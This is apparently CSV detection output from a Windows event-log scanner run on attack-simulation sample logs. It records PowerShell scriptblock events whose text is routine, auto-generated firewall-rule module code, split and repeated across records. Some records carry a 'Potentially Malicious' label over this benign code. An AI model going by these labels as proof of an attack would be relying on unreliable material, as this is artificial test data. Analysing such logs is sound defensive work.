[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) 
$__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 